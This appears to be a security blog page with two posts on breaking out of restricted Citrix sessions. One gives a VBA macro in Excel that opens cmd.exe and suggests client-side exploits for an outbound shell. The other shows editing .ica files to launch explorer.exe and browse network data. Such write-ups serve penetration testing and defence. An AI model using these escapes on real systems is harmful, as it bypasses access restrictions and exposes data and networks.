Restricted Citrix Excel Application Escapes

SynJunkie has a couple good posts on citrix escapes:

http://synjunkie.blogspot.com/search/label/Citrix

and of course iKat

http://ikat.ha.cked.net/

So recently I had to break out of restricted citrix environment. All I had was Excel 2010 and Word 2010.

I also didnt have a fancy "jump to url" option when I clicked on the title bar and none of the hot keys were working for me. So goal was to get a web broswer or cmd shell.

I was able to create macros though. So first I added the developers ribbon.

Click the visual basic button, and paste in some sweet macro code.



Then you save the file as macro enabled workbook.


Once its saved, you can hit the macro button and run your macro.

and get shell


** To be clear all of this is running remotely on the citrix host.**

The macro code

Sub GETSHELL()
'execute EXE file
Shell "CMD /K C:\windows\system32\cmd.exe", vbNormalFocus
End Sub

You could also just type a url into excel...


and click it..But that's pretty low tech and not much fun :-)

Again this IE browser is running remotely on the citrix host. From here you can client-side exploit yourself...i.e. java applet exloit... to get your outbound shell.

Citrix Hacking

**This post is late, i realize the "buzz" about the topic is way past but...

Over on the gnucitizen blog (if you dont read that blog you should, its got tons of web app sec info) awhile back there was some cool CITRIX hacking going on

http://www.gnucitizen.org/blog/hacking-citrix-the-forceful-way
http://www.gnucitizen.org/blog/citrix-owning-the-legitimate-backdoor

anyway, its there (this post is late but hey, i was moving to Washington D.C.) about editing the .ica files to get a shell on the remote box. Most of the .ica files want to funnel you into the single application that they want you to run, this application is listed in the ica file like:

InitialProgram=#PlanVue yakyakyak

but you can simply change that value to whatever you want. now, you might go, hey let me get my cmd.exe immediately but frankly a cmd.exe shell doesnt give you alot of options. of more interest is explorer.exe which will basically give you that little "My Computer" pop up, from there you can take a peek at all the computers on the network via network neighborhood or just poke around for info that probably shouldnt be available to everyone. since hacking is rapidly moving from possessing the root shell to possessing the data its a great way to do some digging into the network.


so to get that nifty explorer.exe box we just need to change it to:

InitialProgram=explorer.exe

and we go from



to



Big fun!

now, you'll still be running as the citrix client so it shouldn't (better not be) any kind of account with privs but you might be able to take a look at that passwords.txt file and get everything you need :-)

-CG